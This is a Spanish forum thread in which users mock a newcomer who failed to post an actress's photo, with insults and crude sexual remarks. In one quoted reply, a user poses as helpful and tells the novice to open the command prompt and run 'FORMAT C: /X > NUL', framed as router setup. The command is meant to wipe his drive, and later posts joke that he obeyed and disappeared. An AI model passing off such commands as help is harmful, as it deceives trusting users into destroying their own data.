podiais decirme quien es esta actriz?? (TODOS CON JAVI)

  • Iniciador del tema Iniciador del tema loky66
  • Fecha de inicio Fecha de inicio
Es el mejor hilo de la historia del foro; propongo retirarlo.
 
Qué manera de cabronear a un chaval tan prometedor... ¡hijos de puta todos! ¡Javi, compañero, vuelve!
 
¡SUBFORO PARA JAVI YA!

Y el de moderador, por supuesto.
 
Espero que no fuera un clon cachondo :)
 
ESPECTACULAR!!!!! jajajaj q tio mas rayao!!!!




mi mama me ha dicho como se hace

2770290496.jpg
 
pero lo mejor no serña eso,si algun dia se entera d como hacerlo(q lo dudo) fijo,pero fijo fijo,q la sube a imageshak, y tenemos ranita pa rato,a la par q cachondeo, este tio es el jefe
 
hay que volver a localizar a este fiera como sea... mira que igual ha hecho lo de hyperman y ya esta navegando... por el espacio exterior! :pla
 
Tampoco tiene tanta gracia... No es por nada, pero no es la primera vez que veo a alguien intentando postear fotos de la misma forma.
Eso sí eran otros tiempos.
NO , no era yo, en ese tiempo me metía en el foro de now112 para postear fotos, luego vino jotapeges y mas tarde photobucket, ahora ya hay un monton
 
Frank rebuznó:
Tampoco tiene tanta gracia... No es por nada, pero no es la primera vez que veo a alguien intentando postear fotos de la misma forma.
Eso sí eran otros tiempos.
NO , no era yo, en ese tiempo me metía en el foro de now112 para postear fotos, luego vino jotapeges y mas tarde photobucket, ahora ya hay un monton
Pues no,en algun subforo algun otro novato tambien ha hecho lo mismo,pero lo que no tiene precio es que le tio a editado 4 veces el mensaje¡¡
 
Todo sobre loky66

Primer Post Registrado: 16 Jun 2005
Cantidad de Mensajes: 1


TODO UN RECORD. Y TODO ESTO CON SU PRIMER POST. ESTE TIO PROMETE.
 
orificio, me acabas de romper la ilusión cabron :oops:
 
a tu imagen insertada tan sólo comentar que me la encuentre como me la encuentre le ensartaba mi mastil

un saludo
 
Hyperman rebuznó:
Javier, no les hagas caso a estos orcos. Vas bien, pero antes tienes que habilitar el formato del puerto del router para que puedas vincular de manera segura los documentos del Escritorio a los foros WEB de Explorer.

Se hace muy facil en Inicio -> Todos los programas -> Accesorios -> Simbolo del sistema

Cuando te salga la ventana negra, escribe lo siguiente:

Primero vinculas los sitios por el puerto seguro, escribiendo:
REM SET ROUTER = C:, foro.putalocura.com
Y pulsas INTRO

Despues defines el formato de C, que es el canal del ROUTER definido antes. Escribes esto:
FORMAT C: /X > NUL
Y pulsas INTRO y se queda parado, la 'S' varias veces.

Pues nada, que tengas suerte.
:137 :137 :137

creo que te ha echo caso, ha desaparecido misteriosamente
 
Arriba Pie